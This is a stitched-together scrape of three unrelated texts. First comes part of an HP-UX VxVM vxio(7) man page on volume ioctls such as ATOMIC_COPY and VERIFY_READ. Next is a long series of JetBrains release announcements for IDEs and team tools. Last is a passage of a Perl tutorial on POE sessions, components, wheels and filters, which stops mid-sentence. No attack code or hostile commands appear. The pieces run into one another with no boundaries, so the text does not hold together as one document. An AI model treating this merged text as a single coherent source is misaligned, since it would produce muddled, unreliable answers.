VxVM 3.5 vxio(7) 1 Jun 2002 The following ioctl commands are supported: GET_DAEMON This ioctl returns the pid of the process with the /dev/vx/config device open, or 0 if it*/ PLEX_DETACH This command is used to force a plex to be detached from a volume. The name of the plex is passed in as an argument. The volume is the volume device against which the ioctl is being performed. VOL_LOG_WRITE This command forces a dirty region log to be flushed to disk. This is used by the vxconfigd process to flush an initial log to - 2 - Formatted: August 2, 2006 vxio(7) VxVM 3.5 vxio(7) 1 Jun 2002 disk before starting the volume. VOL_READ, VOL_WRITE These commands provide a mechanism by which I/O can be issued to volumes larger than 2 gigabytes in length. Current UNIX read and write system calls on 32-bit processors limit sizes to 2 gigabytes because of the signed byte-offset value used to perform the I/O. These ioctl commands provide a method of providing sector offsets to an I/O and raise the limit to one sector less than 1024 gigabytes. The required I/O is identified to the command by the use of a vol_rdwr structure containing the following: ulong_t vrw_flags; /*flags*/ voff_t vrw_off; /*offset in volume (sectors)*/ size_t vrw_size; /*number of sectors to Xfer*/ caddr_t vrw_addr; /*user address for Xfer*/ The vrw_flags field is currently unused; other fields are explained in the comments. VOLUME-SPECIAL IOCTLS The ATOMIC_COPY, VERIFY_READ, and VERIFY_WRITE ioctls perform special I/O operations against the volume. They use the vol_io structure to initiate I/O requests and receive the status information back. The members of the vol_io structure are: voff_t vi_offset; /*0x00 offset on plex*/ size_t vi_len; /*0x04 amount of data to read/write*/ caddr_t vi_buf; /*0x08 ptr to buffer*/ size_t vi_nsrcplex; /*0x0c number of source plexes*/ size_t vi_ndestplex; /*0x10 number of destination plexes*/ struct plx_ent *vi_plexptr;/*0x14 ptr to array of plex entries*/ ulong_t vi_flag; /*0x18 flags associated with op*/ The members of the plx_ent structure are: char pe_name[NAME_SZ]; /*name of plex*/ int pe_errno; /*error number against plex*/ The vi_offset value specifies the sector offset of the I/O within the volume. It must be within the address range of the volume. Also, the entire range of the I/O from vi_offset to vi_offset + vi_len must be within the address range of the volume. The vi_len field specifies the length of the I/O in sectors. It must be a between 0 and 120 sectors (VOL_MAXSPECIALIO). The vi_buf field is a pointer to a buffer of vi_len sectors. The VERIFY_WRITE ioctl writes the data stored in this buffer. - 3 - Formatted: August 2, 2006 vxio(7) VxVM 3.5 vxio(7) 1 Jun 2002 The vi_nsrcplex field is the number of source plexes available for the operation and the vi_ndestplex field is the number of destination plexes available for the operation. The vi_nsrcplex and vi_ndestplex values must be between 0 and 8 (PLEX_NUM). The vi_plexptr is a pointer to an array of plx_ent structures. The first vi_nsrcplex entries in the array are source plexes. The pe_name contains the name of the plex. If the name of the first source entry is the null string, then the kernel selects all plexes available for reading as part of the volume and fills in the pe_name fields. After the source plexes, the next vi_ndestplex entries are the destination plexes. If the name of the first destination entry is the null string, then the kernel selects all plexes available for writing as part of the volume and fills in the pe_name fields. After the I/O operations are performed, the plx_ent structures are copied back to the user. If the kernel selected the plexes, the names of the selected plexes are in the pe_name fields. The status of the operations on each plex are stored in the pe_errno field of the plx_ent structure for that plex. The pe_errno field is 0 if the operation succeeded against the plex. If pe_errno isn't 0, then the error code indicates what happened to the plex. The possible values for pe_errno are: EACCES The specified plex is in the disabled state, so no I/O can be performed against it. EFAULT A source plex is sparse and doesn't have blocks that map the entire I/O request. EIO A read I/O error was returned against a source plex. ENOENT The specified plex isn't associated with the volume the ioctl was issued against. ENXIO An error was detected in the operation, so no I/O operation was attempted to the plex. If one plx_ent structure in a list contains a bad name, then no I/O is done. All plx_ent structures with a valid name have their pe_errno set to ENXIO to indicate no I/O was attempted. EROFS A write I/O error was returned against a destination plex. ESRCH The VERIFY_READ and VERIFY_WRITE operations compare the data from different plexes against each other to verify the consistency. If the comparison detects an error, the plex that was read first is considered correct. An - 4 - Formatted: August 2, 2006 vxio(7) VxVM 3.5 vxio(7) 1 Jun 2002 ESRCH error is returned against the plex that was read second to indicate it contains bad data. For the ATOMIC_COPY, VERIFY_READ, and VERIFY_WRITE ioctls, if the entire operation is a success, then a 0 is returned. If there is a fatal error, a -1 is returned and the external variable errno indicates the reason for failure. If a 1 is returned, there was some sort of failure and the net results must be determined by examining the pe_errno fields of all the plexes. The ioctls that do volume-special I/O are: ATOMIC_COPY This ioctl takes a pointer to a vol_io structure as an argument. It reads vi_len sectors of data, at offset vi_offset, from one of the plexes specified by the first vi_nsrcplex plex entries into a buffer. Then it writes the contents of the buffer onto all the plexes specified by the next vi_ndestplex plex entries at the same offset. This entire operation is atomic with respect to the I/O stream of the volume. The vi_buf field is unused and should be NULL. If the first source plex entry has a null string for the name, the kernel selects from any plex of the volume that is enabled for read access. The names of any selected plexes are copied into the appropriate plex entries. If the first destination plex entry has a null string for the name, the kernel will write to all plexes of the volume that are enabled for write access. The names of selected plexes are copied into the appropriate plex entries. When the list of source plexes has been compiled, the kernel tries to read each plex in order. A plex can't be read if it doesn't have backup storage covering the entire operation. Once a plex has been successfully read, all the destination plexes are written. The writes can succeed even if the destination plex is sparse and doesn't have backup storage to cover the entire write. If the ioctl returns a value of -1, then some error has occurred which prevented the ATOMIC_COPY from working. If the return value is 0, then everything worked fine. If the return value is 1, then the pe_errno field must be examined to determine the errors on each individual plex. The status of the overall operation depends on these individual errors. VERIFY_READ This command accepts a pointer to a vol_io structure as an argument. It reads vi_len sectors, from offset vi_offset, on the first vi_nsrcplex plexes specified by the vi_plexptr array of plex entries. It compares the data from each plex. If any plex - 5 - Formatted: August 2, 2006 vxio(7) VxVM 3.5 vxio(7) 1 Jun 2002 is different from the previous plexes read, the pe_errno value for that plex is set to ESRCH. This entire operation is atomic with respect to the I/O stream of the volume. The vi_ndestplex field must be 0. If the vi_buf field is not NULL, then the data read from the plexes not marked with ESRCH is copied into the buffer specified by vi_buf. As each plex is read, any data that has already been read is compared against the previous reads. If all the data for the plex passes, then any data that was read for the first time is copied into the comparison buffer. This allows VERIFY_READ operations to work if the volume contains sparse plexes. The data not represented by backup storage is not compared against anything. VERIFY_WRITE This command accepts a pointer to a vol_io structure as an argument. It writes vi_len sectors to offset vi_offset on the first vi_ndestplex plexes specified by the vi_plexptr array of plex entries. The data to be written is stored in the buffer pointed to by vi_buf. Then, the data is read back from each plex that was successfully written and is compared against the data written. If the data from any plex doesn't match the data written, the pe_errno value for the plex is set to ESRCH. This entire operation is atomic with respect to the I/O stream of the volume. The vi_nsrcplex field must be 0. As each plex is read, any data that doesn't have backup storage on that plex is filled in from the write buffer. This allows VERIFY_WRITE operations to work if the volume contains sparse plexes. The data not represented by backup storage will always succeed. VOL_LOG_WRITE This command takes no argument, and causes the log for a volume to be written to disk immediately. This command is useful for making sure that the on-disk images of the log have been written. This command returns -1 with errno set to EINVAL if the specified volume does not have logging enabled. PLEX_DETACH This command allows an enabled plex to be detached. The argument is the name of the plex to detach. DIAGNOSTICS The following errors are returned by volume virtual disk device interfaces: - 6 - Formatted: August 2, 2006 vxio(7) VxVM 3.5 vxio(7) 1 Jun 2002 EAGAIN A needed kernel resource couldn't be obtained. EBADF An attempt was made to write a volume that wasn't opened for writing or read a volume that wasn't open for reading. EFAULT A pointer passed to the kernel was invalid, causing a bad memory reference. EINVAL Invalid data was passed to the kernel. Some field in a vol_io structure failed a sanity check. EIO A physical I/O error occurred during an operation. If this error is returned, the driver tried an I/O and it failed. EMFILE The kernel was asked to supply a list of destination plexes for an ATOMIC_COPY or VERIFY_WRITE ioctl. If more than vi_ndestplex enabled plexes available in write mode are found, an EMFILE error is returned. ENFILE The kernel was asked to supply a list of source plexes for an ATOMIC_COPY or VERIFY_READ ioctl. If more than vi_nsrcplex enabled plexes available in read mode are found, an ENFILE error is returned. ENOENT An object named in GET_VOL_STATS ioctl was not associated with the volume. ENOENT The kernel was asked to supply a list of destination plexes for an ATOMIC_COPY or VERIFY_WRITE ioctl. If no enabled plexes available in write mode are found, an ENOENT error is returned. ENXIO A validation error occurred during an I/O operation. If this error is returned, the driver attempted no I/O. ESRCH The kernel was asked to supply a list of source plexes for an ATOMIC_COPY or VERIFY_READ ioctl. If no enabled plexes available in read mode are found, an ESRCH error is returned. FILES /dev/vx/dsk/*... Volume block device files. /dev/vx/rdsk/*... Volume character (raw) device files. SEE ALSO ioctl(2), vxconfig(7), vxiod(7), vxtrace(7) - 7 - Formatted: August 2, 2006
http://modman.unixdev.net/?sektion=7&page=vxio&manpath=HP-UX-11.11
CC-MAIN-2017-13
refinedweb
2,368
63.29
JetBrains News JetBrains Upsource 2.5 is released! We have some exciting news for you today as we've just released Upsource 2.5! Our code review tool is now significantly faster and noticeably smarter. Upsource introduces a redesigned Review page, smart email notifications with a reply-by-email option, discussion labels, a brand new Branches page, and of course a number of improvements in the IDE plugin. Eager to try the new version? Download it here! Updates for all JetBrains Toolbox products as new licensing model is launched Today is a big day because we’ve updated the whole JetBrains Toolbox which includes all our desktop tools, and also launched our new subscription-based licensing model for these products. Here is a short summary and highlights of each update: - ReSharper Ultimate 10 — includes — adds many new features related to debugger, coding assistance, built-in tools, support of languages and frameworks and more. - PhpStorm 10 — brings improvements in PHP language support, editing experience, debugging, code analysis, and many other powerful features. - WebStorm 11 — adds support for TypeScript 1.6, Flow and Angular 2, integration with Yeoman, and thorough improvements. - PyCharm 5 — brings an outstanding lineup of new features, including full Python 3.5 support, Docker integration, Thread Concurrency Visualization, and more. - AppCode 3.3 — adds support for Xcode 7, Objective-C generics and multiple Swift 2 features. - CLion 1.2 — introduces Google Test support, productivity features for CMake, C++ debugger performance improvements, new VCS features and more. - RubyMine 8 — brings improved experience in managing gems with Rbenv gemsets and a better Bundler, faster debugger and more. One important addition that JetBrains Toolbox makes possible is a special 'All Products' plan allowing you to use any product from the list depending on your current needs. Note that you do not have to switch to the new model immediately. Your valid upgrade subscription still works and will work until its expiration date. After that you will be able to switch to the new model. You are welcome to check JetBrains Toolbox pricing and terms & conditions at jetbrains.com/store. Please contact us if you have any questions. PyCharm Edu 2: Simple is better than complex Please welcome PyCharm Edu 2, the newest release of our free and easy-to-use IDE for learning and teaching programming with Python. Inspired by the motto, "Simple is better than complex" from The Zen of Python, PyCharm Edu 2 introduces an even simpler user interface with brand new features to help novice programmers become professionals more quickly than ever before. What’s New in PyCharm Edu 2? For novice programmers: - Simplified step-by-step debugger - Inline debugger - Simplified UI - Temporary Python Scratch files - Quick Python packages installation For course authors: Please see the what's new page for more details, learn how Pycharm Edu works and don't wait a moment longer — Download PyCharm Edu 2 and start you journey with Python programming today! For more details and learning materials, visit the PyCharm Edu website and check out the Quick Start guide to get rolling. Welcome AppCode 3.2 release! Today we are happy to share with you that AppCode 3.2 is officially available. We've put a lot of effort into this release, and more. There are several other important changes. First, UI Designer has moved into an optional plugin. Second, we offer a separate distribution package targeting OS X Yosemite users with custom bundled JDB, based on JDK 1.8, which includes fixes from the JetBrains team for several annoying problems appeared in JDK. Read more about that. And last but not least, please note that AppCode 3.2 officially supports Xcode 6.4 on OS X 10.10 and Xcode 6.2 on OS 10.9. We've already shared some explanations in an earlier post talking about the release candidate. Finally, please note that this update is free for all AppCode users with an active license subscription! To download the release build, please visit our site. For a more detailed overview, visit the What's new in AppCode 3.2 page. Welcome ReSharper 9.2, ReSharper C++ 1.1 and More ReSharper Ultimate Updates A new update to JetBrains ReSharper Ultimate is now available for download! This update includes ReSharper 9.2, dotTrace 6.2, dotCover 3.2, dotMemory 4.4, dotPeek 1.5, and ReSharper C++ 1.1. ReSharper 9.2 highlights include: - Improved support for Visual Studio XAML constructs. - JavaScript and TypeScript support enhancements including full support for TypeScript 1.5 and ECMAScript 6, as well as support for regular expressions in JavaScript.. If you have dotTrace installed and integrated in Visual Studio, you can launch profiling from the same Alt+Enter pop-up menu. ReSharper C++ 1.1 comprises the following enhancements: -. - Includes Hierarchy view helps visualize dependencies between #include directives. - Improved support for C++ core features inline specifiers on a function definition and functions that can be const, as well as quick-fixes for these inspections. Automatic import now works with macros as well. - A set of performance improvements, most notably ensuring that quick-fixes are immediately available on solution load. All other ReSharper Ultimate tools have been enhanced as well: - dotTrace 6.2 is highlighted with: - Analysis of incoming HTTP requests in Timeline mode to make your web applications faster. - Support for predefined run configurations to instantly profile any part of your code on the spot. - Updated command line tools supporting additional profiling functionality. - dotCover 3.2 integrates with ReSharper 9.2 and provides a set of bug-fixes. - dotMemory 4.4 is notable for: - Letting you optimize memory usage with less effort, by getting snapshots automatically when a specified condition is met. - Improving the Sunburst diagram for easier navigation in Visual Dominators view. - dotMemory Unit framework 2.0 receives a stand-alone launcher for continuous integration, and extends the list of supported unit testing frameworks. Download the updated ReSharper Ultimate as a single installer and give it a try! and download CLion for your operating system. YouTrack 6.5: Issue Tracker Designed for Development Teams Today we bring you YouTrack 6.5 featuring a number of integrations and revamped Administration and YouTrack configuration. We've redesigned these areas keeping your user experience as our main priority. The latest release also introduces: - Integration with BitBucket and GitLab - Upsource integration - One-click Jira import - Project Wizard The following parts of YouTrack have been enhanced as well: - GitHub and TeamCity integration - Dashboard, mailbox integration and workflow - Bug-fix versions included in the license - Mention @username notifications For more details visit the What's new page. Get YouTrack 6.5 to start enjoying better user experience in addition to the awesome issue tracking your development team is already used to. The latest version is available for download or cloud registration. Hub 1.0: Single Entry Point for All JetBrains Teamware Please welcome Hub 1.0, our brand new user management tool that works as a single entry point for all JetBrains teamware, including YouTrack, Upsource and TeamCity. Hub is absolutely free for an unlimited number of users, forever. Connect YouTrack and Upsource with Hub to get: - Single sign-on to YouTrack and Upsource - Unified user and permission management - Dashboard with widgets from all the tools - A project wizard that creates and links appropriate projects in all tools - Tools connected out of the box TeamCity will join the club with a special Hub plugin very soon. Please stay tuned for more news. Read more about how Hub connects JetBrains teamware into a fully integrated suite of tools and Download Hub free today. TeamCity 9.1 released: Improved Versioned Settings, enhanced .NET support, security upgrades, and more. As of today, TeamCity 9.1, the latest version of your favorite Continuous Integration and Deployment server, is available for download. This minor release comes with a lot of big improvements. Here is what's new: - Major improvements in Versioned Settings: - Create true historical builds, reproducing any of your builds at any point in time, dated back to as long ago as your VCS allows - Different settings in different branches for storing different builds steps and parameters in different branches, and applying them when needed - Personal builds with personal settings let you test-drive custom project settings, and apply them if a build is successful - Perforce and Subversion are now supported for Versioned Settings, adding to the previously available Git and Mercurial - Enhanced support for .NET tools: - Support for NUnit 3.0 and guaranteed compatibility between all upcoming features of NUnit and TeamCity - VS 2015, MSBuild 2015, MSTest 2015, Powershell 5, TFS 2015 are fully supported, even before their official releases - MSTest and VSTest are combined into a single Visual Studio Tests Runner and supported out of the box - TeamCity 9.1 comes with pumped up security, introducing unidirectional Agent-Server communication which lets your agents establish a secure HTTPS connection with the server. 20+ important security improvements have also been implemented. - UI and usability improvements - Reorder projects to better represent your actual project structure - Reorder charts in a way that's most convenient for you and your team - Coloring and URLs in build logs makes it easier to spot important details in logs Please see What's New for more details and download TeamCity 9.1 for your server. PhpStorm 9: Progress. Advance. Develop. PhpStorm 9, the next big release of our IDE for PHP and web development, is already here.. For more details please see What's New in PhpStorm 9 and download the IDE for your operating system. Don't miss our a webinar overviewing the new features and improvements in PhpStorm 9, scheduled for July 22nd, 14:00 GMT. Click here to join the webinar. Upsource 2.0 Introduces IDE Plugin, Streamlines Code Review Meet a major update to repository browser and code review tool from JetBrains: Upsource 2.0 is now available for download. If you have an existing license to Upsource 1.0, then 2.0 would be a free upgrade for you. If you don't have an existing license, note that a 10-user plan is free anyway.The new Upsource release comes with numerous improvements across many areas including code review process, support for version control systems, and managing reviews from within the IDE. Here are some of the highlights of the release: - Upsource 2.0 delivers an IDE plug-in for code review that works with IntelliJ IDEA, WebStorm, Android Studio and more IDEs built on the IntelliJ platform. The plug-in helps submit revisions for review and manage the code review cycle, shows review comments and allows creating new comments right from within the text editor. - Upsource 2.0 adds support for SVN branches along with Git and Mercurial branches. Other improvements in terms of VCS include support for Git and Mercurial tags, as well as setting up multiple VCS repositories in a single Upsource project. - If your team is into Java development, you should know that Upsource 2.0 brings Java code inspections, navigation and search to Gradle-based projects in addition to Maven that was supported earlier. Upsource 2.0 can also compare Java code usages across revisions with a new action called View usages diff. - Upsource 2.0 streamlines managing code reviews and taking part in them. For example, reviewer suggestions help authors find and assign appropriate reviewers faster. For reviewers, Upsource provides look through when inspecting changes between any two revisions. - Multiple improvements to the commenting system include live comment preview, persisting comment drafts, and adding inline comments to the Review timeline for a quicker overview of things to be improved within a review. Learn more and download Upsource 2.0. PyCharm 4.5: All Python Tools in One Place Please welcome PyCharm 4.5, a new important release of our intelligent IDE for Python, Django and Web development that unites even more tools and features together, working smoothly in one place to bring a unique development experience. The key features in this release include: - Python Profiler Integration - Inline Debugger - matplotlib interactive mode - Ignore Library Files and Step into My Code debugger options - Navigation From Variables View - New and re-worked manage.py tool for Django projects - Improved Django 1.8 code insight - Bulk move refactoring - New refactorings: Convert to module & Convert to package - Significantly improved IPython Notebook integration with the new IPython Notebook console - Temporary Python Scratch Files - Initial support for Python 3.5 - Distraction-free mode - And even more For more details on these and other new features and changes in PyCharm 4.5 please see our What's New page, and download the IDE for your platform. RubyMine 7.1: Puppet improvements, better JavaScript and CoffeeScript, and more We thought you’d be interested to know that RubyMine 7.1, an important update to our intelligent Ruby on Rails IDE, is now available for download. RubyMine 7.1 is focused on better integration with Puppet for managing project infrastructure, while also improving your web development experience. The following features are on board: - Better Puppet integration: With all the new features of Puppet 4, resolving externally defined symbols, and Puppet environments. - Improved CoffeeScript support: ?= operator, better navigation and formatter, and improved support for destructuring arrays and objects. - Faster JavaScript: Completely reworked support for JavaScript large code bases and lots of enhancements in ECMAScript 6 support. - TypeScript 1.4 & 1.5 support and built-in compiler: Support for union types, let and const keywords, as well as decorators and ES6 modules; compiling to JS code with all the errors highlighted in the editor on the fly. - Move class/module refactoring: This new refactoring moves a Ruby class or module to its own file, creates a hierarchy of directories, and adds a 'require' statement to the source file. - Distraction-free mode: A minimalistic UI mode option with no toolbars, tool windows or tabs; ideal when you just need to focus on nothing but code. - Simultaneous HTML tag editing: As you edit an opening HTML tag, RubyMine takes care of the closing one. Other notable updates include Ruby 2.2.x debugger, faster Vagrant commands, Phusion Passenger 5 support, and HiDPI support for Windows and Linux. To learn more about RubyMine 7.1, please visit our What’s New page. You can buy or renew your RubyMine license on our website. This update is free for you if you have an active upgrade subscription valid as of April 15th, 2015. CLion 1.0 has finally arrived! We are really excited today to tell you that CLion 1.0, the very first release of our cross-platform C/C++ IDE, is here! 1.0: - C, C++ (including C++11 support, libc++ and Boost), as well as JavaScript, XML, HTML and CSS. - Compatible with 64-bit Linux, OS X, and 64-bit Windows. - Compilers: - GCC/G++ and Clang support on OS X and Linux; - MinGW 32/64 3.* or Cygwin 1.7.* on Windows. - Bundled toolchains: CMake 3.1.2 and GDB 7.8 (except for Cygwin on Windows). - CMake support, including: - Propagating CMake settings to the IDE, using CMake as a project model in CLion. - Automatic CMake changes handling. - Auto-Completion for CMake commands. - CMakeCache editor. - Powerful editor with autoformatting, multiple cursors, and smart completion. - A range of one-click navigation options. - Code generation features to save your time while coding. - Reliable refactorings, including Rename, Change Signature, Extract Function/Constant/Define/Typedef, Pull Members Up, Push Members Down, and more. - Integrated debugger. - Integrates with most popular version control systems, including Subversion, Git, GitHub, Mercurial, CVS, Perforce (via plugin), and TFS. - Terminal and Vim-emulation mode (via plugin). - Keyboard-centric approach, with lots of popular keymaps supported and the ability to customize them. You can download a 30-day free trial from our website and check out the Quick Start Guide to become familiar with the IDE. ReSharper C++ is released along with updates to JetBrains .NET tools We have just finalized a joint update to our .NET tools, added the first ever public version of ReSharper for C++, and the new release of ReSharper Ultimate is now available for download! This update consists of ReSharper 9.1, dotTrace 6.1, dotCover 3.1, dotMemory 4.3, dotPeek 1.4 and ReSharper C++ 1.0, a new product to join our ReSharper Ultimate family. In addition to 700+ fixes, ReSharper 9.1 highlights include: - Improved support for Visual Studio 2015 and .NET 4.6. ReSharper 9.1 integrates actions based on Visual Studio Roslyn, so when you want to make changes to your code, you can choose either ReSharper or Visual Studio to do it for you, all from the same Alt+Enter menu. - Better C#6.0 support that makes it easier to migrate an existing codebase to C#6.0. In addition to language constructs such as static usings and exception filters, we have added support for string interpolation and the nameof() operator. To simplify migrating your projects to C#6.0, ReSharper now offers quick-fixes to transform your code in the scope of a file, project or the whole solution. - JavaScript and TypeScript improvements including JSDoc support, improved TypeScript 1.5 and EcmaScript 6 support, as well as full understanding of TypeScript 1.4. - A new Evaluate expression context action that allows previewing the results of code execution right in the editor. For example, you can see how an exception message will look like at runtime, or check whether an expression returns the value it's supposed to return. - Improved code completion: we have implemented a new mechanism that lets you order items by relevance so that the best fitting options are suggested higher in the code completion popup list. - Find types on NuGet. When you have a type or namespace used inside your project that can’t be resolved to referenced libraries or packages, ReSharper can now search for this type or namespace in the NuGet package gallery, display the list of matching packages and easily download and install the package that you choose. - New Source Templates that can be created anywhere in the code of your project as extension methods and might be very handy in case you need to produce some repeatable code that is only relevant in your current project or solution. The other .NET tools in ReSharper Ultimate have been enhanced as well: - dotCover 3.1 improves support of MSTest and WinStore tests and ships numerous fixes for console tools. - dotTrace 6.1 receives the long-awaited support for SQL queries in Timeline profiling mode. Now you can determine exactly how long a particular query executes and which method runs the query. - The rich set of informative views in dotMemory 4.3 is extended with Dominators sunburst chart. A quick glance at the hierarchy of dominators tells you which objects are crucial and how memory is retained in your application. - Welcome dotMemory Unit: the state-of-the-art .NET memory monitoring framework. You can now extend your unit tests with the functionality of a memory profiler. Please check this blog post for more details. - dotPeek 1.4 adds support for Visual Studio 2015 and C#6.0. In addition to these upgrades to our .NET tools, we are rolling out the inaugural release of ReSharper C++. A separate product for C++ developers who work in Visual Studio, ReSharper C++ inherits most features of ReSharper including its powerful navigation, coding assistance and code generation. To learn more, please visit the ReSharper C++ web site. Download ReSharper Ultimate featuring ReSharper C++ and give it a try! WebStorm 10. Because JavaScript Today is a big day for us, as we roll outWebStorm 10, a major update of your favorite JavaScript IDE. You can download and install it right now! This 10th anniversary release strives to meet your highest expectations, including language and technology support, fast performance and powerful features: - Improved JavaScript support: We’ve completely reworked support for JavaScript and added lots languages compiled to JavaScript. - V8 profiling for Node.js apps: Capture and analyze V8 CPU profiles and heap snapshots to eliminate performance bottlenecks and fight memory issues. Other noticeable updates include brand new Distraction-free mode, improved Grunt integration, simultaneous HTML tag editing, project-wide Dart code analysis, and HiDPI support for Windows and Linux. For a more detailed overview please visit What’s new in WebStorm 10, and download the IDE for your OS. IntelliJ IDEA 14.1 is Here We’ve worked hard this year to bring you IntelliJ IDEA 14.1, a fresh update for your favorite Java IDE.. For more details please read What's New in IntelliJ IDEA 14.1 and download the edition of your choice.
http://www.jetbrains.com/allnews.jsp?year=2010
CC-MAIN-2016-07
refinedweb
3,438
56.86
import "golang.org/x/exp/sumdb/internal/sumweb" Package sumweb implements the HTTP protocols for serving or accessing a go.sum database. cache.go client.go encode.go server.go test.go ErrGONOSUMDB is returned by Lookup for paths that match a pattern listed in the GONOSUMDB list (set by SetGONOSUMDB, usually from the environment variable). ErrSecurity is returned by Conn operations that invoke Client.SecurityError. ErrWriteConflict signals a write conflict during Client.WriteConfig. Paths are the URL paths for which Handler should be invoked. Typically a server will do: handler := &sumweb.Handler{Server: srv} for _, path := range sumweb.Paths { http.HandleFunc(path, handler) } type Client interface { // ReadRemote reads and returns the content served at the given path // on the remote database server. The path begins with "/lookup" or "/tile/". // It is the implementation's responsibility to turn that path into a full URL // and make the HTTP request. ReadRemote should return an error for // any non-200 HTTP response status. ReadRemote(path string) ([]byte, error) // ReadConfig reads and returns the content of the named configuration file. // There are only a fixed set of configuration files. // // "key" returns a file containing the verifier key for the server. // // serverName + "/latest" returns a file containing the latest known // signed tree from the server. It is read and written (using WriteConfig). // To signal that the client wishes to start with an "empty" signed tree, // ReadConfig can return a successful empty result (0 bytes of data). ReadConfig(file string) ([]byte, error) // WriteConfig updates the content of the named configuration file, // changing it from the old []byte to the new []byte. // If the old []byte does not match the stored configuration, // WriteConfig must return ErrWriteConflict. // Otherwise, WriteConfig should atomically replace old with new. WriteConfig(file string, old, new []byte) error // ReadCache reads and returns the content of the named cache file. // Any returned error will be treated as equivalent to the file not existing. // There can be arbitrarily many cache files, such as: // serverName/lookup/pkg@version // serverName/tile/8/1/x123/456 ReadCache(file string) ([]byte, error) // WriteCache writes the named cache file. WriteCache(file string, data []byte) // Log prints the given log message (such as with log.Print) Log(msg string) // SecurityError prints the given security error log message. // The Conn returns ErrSecurity from any operation that invokes SecurityError, // but the return value is mainly for testing. In a real program, // SecurityError should typically print the message and call log.Fatal or os.Exit. SecurityError(msg string) } A Client provides the external operations (file caching, HTTP fetches, and so on) needed to implement the HTTP client Conn. The methods must be safe for concurrent use by multiple goroutines. A Conn is a client connection to a go.sum database. All the methods are safe for simultaneous use by multiple goroutines. NewConn returns a new Conn using the given Client. Lookup returns the go.sum lines for the given module path and version. The version may end in a /go.mod suffix, in which case Lookup returns the go.sum lines for the module's go.mod-only hash. SetGONOSUMDB sets the list of comma-separated GONOSUMDB patterns for the Conn. For any module path matching one of the patterns, Lookup will return ErrGONOSUMDB. Any call to SetGONOSUMDB must happen before the first call to Lookup. SetTileHeight sets the tile height for the Conn. Any call to SetTileHeight must happen before the first call to Lookup. If SetTileHeight is not called, the Conn defaults to tile height 8. A Handler is the go.sum database server handler, which should be invoked to serve the paths listed in Paths. The calling code is responsible for initializing Server. type Server interface { // NewContext returns the context to use for the request r. NewContext(r *http.Request) (context.Context, error) // Signed returns the signed hash of the latest tree. Signed(ctx context.Context) ([]byte, error) // ReadRecords returns the content for the n records id through id+n-1. ReadRecords(ctx context.Context, id, n int64) ([][]byte, error) // Lookup looks up a record by its associated key ("module@version"), // returning the record ID. Lookup(ctx context.Context, key string) (int64, error) // ReadTileData reads the content of tile t. // It is only invoked for hash tiles (t.L ≥ 0). ReadTileData(ctx context.Context, t tlog.Tile) ([]byte, error) } A Server provides the external operations (underlying database access and so on) needed to implement the HTTP server Handler. A TestServer is an in-memory implementation of Server for testing. NewTestServer constructs a new TestServer that will sign its tree with the given signer key (see golang.org/x/exp/sumdb/internal/note) and fetch new records as needed by calling gosum. Package sumweb imports 14 packages (graph) and is imported by 2 packages. Updated 2019-11-29. Refresh now. Tools for package owners.
https://godoc.org/golang.org/x/exp/sumdb/internal/sumweb
CC-MAIN-2019-51
refinedweb
803
59.09
Day in and day out, I write large applications in perl. I'm cursed I tell you. While large scale, long-running applications in pure perl may sound fairly easy to write, they are not. Perl, beyond a certain size and complexity, gets really difficult to manage if one is not extremely careful. The proper choice of an application framework helps to minimize this difficulty. For many applications, apache and mod_perl make a lot of sense. This is an excellent choice for user interface applications and data display systems. However, HTML and the WWW simply don't make sense for many forms of long-running applications, particularly network based servers. Apache certainly isn't the right choice for syslog monitoring or edge host traffic analysis. My framework of choice. SESSIONS POE programs begin with a 'session'. Each session represents a cooperatively multi-tasked state machine. POE::Session->create( inline_states => { _start => \&start, _stop => \&stop, do_something => \&do_something, }, heap => { 'some' => 'data', }, );. Sessions provide very simple, easy to understand building blocks on which to build more complex applications. POE provides a way to give sessions names, called aliases, which uniquely address the session from outside the session itself. $poe_kernel->alias_set($alias) sets an alias for the current session. Any POE session in the process can then send events to that session using the named identifier. if($door_bell) { $poe_kernel->post( $alias => 'pizza' ); } Remote addressing provides the ability to have a service-like model inside an application. Different sessions provide different services to the application. One session may provide DNS resolution while another provides data storage. Using commonly known names, perhaps stored in a config file, the central application becomes much smaller and easier to manage. COMPONENTS POE components provide an abstract api to service-like POE sessions. Rather than duplicating the session construction call and the accompanying subroutines every time you find a new use for your sessions, it is a better idea to roll all that code into a perl module. package POE::Component::MyService; sub create { POE::Session->create( # ... ); } sub start { $poe_kernel->alias_set(__PACKAGE__); } #### #!/usr/bin/perl use POE; use POE::Component::MyService; POE::Component::MyService->create(); POE::Kernel->run(); The POE community has created a standard namespace of POE::Component for these modules. Typically they have a constructor called create() or spawn() and provide a service to the POE application via a session. Apart from these few simple rules, components are free to do whatever is necessary to fulfill their purpose. POE::Component::Server::Syslog, for instance, spawns a UDP listener and provides syslog data via callbacks. POE::Component::RSS accepts RSS content via an alias and calls specially named events to deliver data. POE::Component::IRC follows a similar model. WHEELS For some tasks, a full session is unnecessary. Sometimes, it makes more sense to alter the abilities of an existing session to provide the desired functionality. POE has a special namespace called POE::Wheel for modules which mutate or alter the abilities of the current session to provide some new functionality. package POE::Wheel::MyFunction; sub new { # ... } #### #!/usr/bin/perl use POE; use POE::Wheel::MyFunction; POE::Session->create( #... foo => \&foo, ); POE::Kernel->run(); sub start { POE::Wheel::MyFunction->new( FooState => 'foo' ); } Where components often use subroutine callbacks in the same way as POE::Session, wheels use local event names to provide functionality. Internally, they create wrappers around calls to these events which build the context necessary for a POE event to occur. Wheels are much more complex to create, for good reason. Wheels share their entire operating context with the user's session but share very little of the niceties. Wheels do not have their own heap and cannot create aliases for themselves. In many ways, they are like a parasite clinging to the side of the user's code. As long as they don't get in the way and they provide a useful function, they are allowed to exist. The development overhead is made up for, however, by the loss of internal POE overhead. Sessions require a certain amount of maintenance to keep running. POE checks sessions to see if they still have work to do, if there are timers or alarms outstanding for them, if they should be garbage collected, etc etc. The more sessions that exist in a system, the more that overhead grows. This overhead is especially noticeable in time sensitive applications. Wheels have none of this overhead. They piggyback on top of the user's session so, apart from any events they may trigger as part of their normal operation, there is no inherent internal POE overhead in using a wheel. FILTERS Many wheels handle incoming and outgoing data. They exist to help the user get data from some strange source (say, HTTP) into a format the user can analyze or take apart in perlish ways. POE::Wheel::SocketFactory, for instance, handles all the scariness of nonblocking socket creation and maintenance. For most of us, however, SocketFactory doesn't go far enough. I don't want to have to worry about pack calls or http headers or whatever other nonsense is necessary to take a transaction off the wire and make it palatable. Special modules in the POE::Filter namespace handle this drudgery. package POE::Filter::MyData; sub new { # ... } sub put { # ... } sub get { # ... } Filters are very simple data parsing modules. Most POE filters are 